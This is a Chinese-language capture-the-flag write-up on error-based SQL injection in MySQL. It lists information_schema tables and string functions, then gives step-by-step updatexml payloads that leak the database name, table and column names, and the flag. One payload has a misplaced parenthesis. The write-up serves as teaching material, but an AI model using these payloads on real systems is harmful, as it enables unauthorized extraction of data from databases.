报错注入:
需要了解mysql的知识点:
union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符
和一些基本sql语法
和一些基本注释:
#,–空格,/* */
首先输入:1’
发现报错
于是构造报错注入,由于不存在引号于是得到语句:
1 and updatexml(1,concat(0x7e,(select database(),0x7e),1)
得到当前数据库,于是查看数据库的表名
构造语句:
1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=‘sqli’ limit 1),0x7e),1)
得到表flag ,查看flag表的字段;
1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’ limit 1) ,0x7e),1)
得到字段flag,查看字段,构造语句:
1 and updatexml(1,concat(0x7e,(select group_concat(flag) from sqli.flag),0x7e),1)
得到flag